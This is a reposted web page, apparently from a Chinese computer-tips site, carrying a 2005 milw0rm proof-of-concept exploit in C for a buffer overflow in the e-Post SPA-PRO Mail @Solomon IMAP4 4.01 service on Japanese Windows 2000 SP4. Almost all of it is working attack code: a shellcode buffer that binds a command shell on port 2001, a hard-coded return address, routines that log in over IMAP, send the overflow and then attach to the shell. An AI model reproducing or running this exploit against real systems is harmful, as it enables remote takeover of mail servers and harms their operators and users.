首页 电脑 电脑学堂 查看内容

e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service 缓冲溢出程序

2005-6-3 02:40 624 0

摘要: //**************************************************************************// e-Post SPA-PRO Mail @...
关键词: nbsp 地址 指令 一个 寄存器 堆栈 内存 变量 字节 指向

//**************************************************************************// e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow // Vulnerability//// Bind Shell POC Exploit for Japanese Win2K SP4// 31 May 2005//// This POC code binds shell on port 2001 of a vulnerable e-Post// SPA-PRO Mail @Solomon IMAP server.//// This POC assumes default mailbox configuration C:\mail\inbox\%USERNAME%// Any changes to the mailbox configuration will cause this POC to// fail due to the length differences.////// Advisory // http://www.security.org.sg/vuln/spa-promail4.html// http://www.security.org.sg/vuln/spa-promail4-jp.html////************************************************************************** #include <stdio.h>#include <conio.h>#include <winsock2.h>#include <windows.h>#pragma comment (lib,"ws2_32.lib") unsigned char expBuf[] = "2 create \"""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x55\x8B\xEC\x33\xC9\x66\xB9\xE8\x03\x2B\xE1\x32\xC0\x8B\xFC\xF3""\xAA\xB1\x30\x64\x8B\x01\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x70\x08""\xD9\xEE\xD9\x74\x24\xF4\x5F\x83\xC7\x0C\xEB\x53\x60\x8B\x6C\x24""\x24\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x8B\x7E\x20\x03\xFD\x8B""\x4E\x18\x56\x33\xDB\x8B\x37\x03\xF5\x33\xC0\x99\xAC\x85\xC0\x74""\x07\xC1\xCA\x0D\x03\xD0\xEB\xF4\x3B\x54\x24\x2C\x74\x09\x83\xC7""\x04\x43\xE2\xE1\x5E\xEB\x16\x5E\x8B\x7E\x24\x03\xFD\x66\x8B\x04""\x5F\x8B\x7E\x1C\x03\xFD\x8B\x04\x87\x01\x44\x24\x24\x61\xC3\x89""\x75\xF4\x68\x8E\x4E\x0E\xEC\x56\xFF\xD7\x59\x33\xC0\x66\xB8\x6C""\x6C\x50\x68\x33\x32\x2E\x64\x68\x77\x73\x32\x5F\x54\xFF\xD1\x8B""\xF0\x68\xD9\x09\xF5\xAD\x56\xFF\xD7\x5B\x83\xC4\x20\x6A\x01\x6A""\x02\xFF\xD3\x89\x45\xD0\x68\xA4\x1A\x70\xC7\x56\xFF\xD7\x5B\x33""\xC0\x50\xB8\xFD\xFF\xF8\x2E\x83\xF0\xFF\x50\x8B\xC4\x6A\x10\x50""\xFF\x75\xD0\xFF\xD3\x68\xA4\xAD\x2E\xE9\x56\xFF\xD7\x5B\xFF\x75""\xD0\xFF\xD3\x8B\xCC\x6A\x10\x8B\xDC\x68\x35\x54\x8A\xA1\x56\xFF""\xD7\x5A\x50\x50\x53\x51\xFF\x75\xD0\xFF\xD2\x8B\xD0\x68\xE7\x79""\xC6\x79\x56\xFF\xD7\x58\x89\x45\xF0\x8B\x75\xF4\x83\xC4\x20\xC6""\x04\x24\x44\xC6\x44\x24\x2D\x01\x89\x54\x24\x38\x89\x54\x24\x3C""\x89\x54\x24\x40\x8B\xC4\x8D\x58\x44\x68\x72\xFE\xB3\x16\x56\xFF""\xD7\x5A\xB9\xFF\x63\x6D\x64\xC1\xE9\x08\x51\x8B\xCC\x53\x53\x50""\x33\xC0\x50\x50\x50\x6A\x01\x50\x50\x51\x50\xFF\xD2\x5B\x68\xAD""\xD9\x05\xCE\x56\xFF\xD7\x58\x6A\xFF\xFF\x33\xFF\xD0\xFF\x74\x24""\x48\xFF\x55\xF0\xFF\x75\xD0\xFF\x55\xF0\x68\xEF\xCE\xE0\x60\x56""\xFF\xD7\x58\xFF\xD0\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\xe9\x4f\xfe\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x54\x54\x54\x54""\x55\x55\x55\x55\x56\x56\x56\x56\x57\x57\x57\x57\xE9\x0C\xFE\xFF""\xFF\xCC\xEB\xa0\x5A\xD6\x19\xF8\x74\x41\x41\x41\x42\x42\x42\x42""\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46""\x47\x47\x47\x47\x48\x48\x48\x48\x36\x49\x49\x49\x4A\x4A\x4A\x4A""\x4B\x4B\x4B\x4B\x4C\x4C\x4C\x4C\x4D\x4D\x4D\x4D\x4E\x4E\x4E\x4E""\x4F\x4F\x4F\x4F\x50\x50\x50\x50\x51\x51\x51\x51\x52\x52\x52\x52""\x53\x53\x53\x53\x54\x54\x54\x54\x55\x55\x55\x55\x56\x56\x56\x56""\x57\x57\x57\x57\x58\x58\x58\x58\x59\x59\x59\x59\x5A\x5A\x5A\x5A""\"\r\n"; void shell(int sockfd){ char buffer[1024]; fd_set rset; FD_ZERO(&rset);  for(;;) {  if(kbhit() != 0)  {     fgets(buffer, sizeof(buffer) - 2, stdin);   send(sockfd, buffer, strlen(buffer), 0);  }   FD_ZERO(&rset);  FD_SET(sockfd, &rset);   timeval tv;  tv.tv_sec = 0;  tv.tv_usec = 50;    if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)  {   printf("select error\n");   break;  }          if(FD_ISSET(sockfd, &rset))  {   int n;    ZeroMemory(buffer, sizeof(buffer));   if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)   {    printf("EOF\n");    return;   }   else   {    fwrite(buffer, 1, n, stdout);   }  } }} #define ADDR_POSITION  534#define RET_ADDR   0x74F819D6  // CALL EBX in Japanese Win2K SP4 // First short jump backwards. (EB AO) // You should know what to change here, landing onto INT 3 to let debugger kick in.#define FIRST_BACKJMP_INST 0x5AA0EBCC int main(int argc, char* argv[]){ WORD wVersionRequested; WSADATA wsaData; struct sockaddr_in sin; int err; char inBuffer[10000]; char loginBuf[1000];  if(argc != 4) {  printf("\nUsage: %s <imap username> <imap password> <ip addr>\n", argv[0]);  return 1; }  if(strlen(argv[1]) <= 0 || strlen(argv[1]) > 20) {  printf("\nInvalid IMAP username!  Maximum username length is 20.\n");  return 1; }  if(strlen(argv[2]) <= 0 || strlen(argv[2]) > 14) {  printf("\nInvalid IMAP password!  Maximum password length is 14.\n");  return 1; }  memset(loginBuf, 0, sizeof(loginBuf)); _snprintf(loginBuf, sizeof(loginBuf), "1 login \"%s\" \"%s\"\r\n", argv[1], argv[2]); loginBuf[sizeof(loginBuf)-1] = 0;  int retPos = ADDR_POSITION - (strlen(argv[1]) - 1);  *((DWORD *)&expBuf[retPos]) = RET_ADDR; *((DWORD *)&expBuf[retPos-4]) = FIRST_BACKJMP_INST;  wVersionRequested = MAKEWORD(2,0); err = WSAStartup(wVersionRequested, &wsaData); if(err != 0) {  printf("\nWSAStartup Error.\n");  return 1; }  if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0) {  printf("\nWinsock Version Error\n");  WSACleanup();  return 1; }  SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);  sin.sin_addr.s_addr = inet_addr(argv[3]); sin.sin_family = AF_INET; sin.sin_port = htons(143);  printf("\n[+] Trying to connect to %s\n", inet_ntoa(sin.sin_addr));  if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR) {  int size;     // read IMAP banner  size = recv(s, inBuffer, sizeof(inBuffer), 0);  if(size == SOCKET_ERROR)  {   printf("[-] Error receiving IMAP banner!\n");   return 1;  }   printf("[+] IMAP banner received!\n\n");  fwrite(inBuffer, 1, size, stdout);  printf("\n");   if(send(s, (char *)loginBuf, strlen((char *)loginBuf), 0) == SOCKET_ERROR)  {   printf("[-] Error sending login!\n");   return 1;  }   printf("[+] Login Sent.\n");   size = recv(s, inBuffer, sizeof(inBuffer), 0);  if(size == SOCKET_ERROR)  {   printf("[-] Error receiving login reply!\n");   return 1;  }  if(strstr(inBuffer, "OK"))   printf("[+] Login successful!\n");  else  {   printf("[+] Login failed!\n");   return 1;  }   if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR)  {   printf("[-] Error sending exploit!\n");   return 1;  }  else  {   printf("[+] Exploit sent!\n");  }   Sleep(2000);   //================================= Connect to the target ==============================  SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);  if(sock == INVALID_SOCKET)  {   printf("Invalid socket return in socket() call.\n");   WSACleanup();   return -1;  }   sin.sin_family = AF_INET;  sin.sin_port = htons(2001);  sin.sin_addr.s_addr = inet_addr(argv[3]);   if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)  {   printf("Exploit Failed. SOCKET_ERROR return in connect call.\n");   closesocket(sock);   WSACleanup();   return -1;  }    printf("[+] Exploit successful!\n\n");  shell(sock);  closesocket(sock);  } else {  printf("[-] Cannot connect!\n"); }  closesocket(s); WSACleanup();  return 0;}// milw0rm.com [2005-06-02]
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部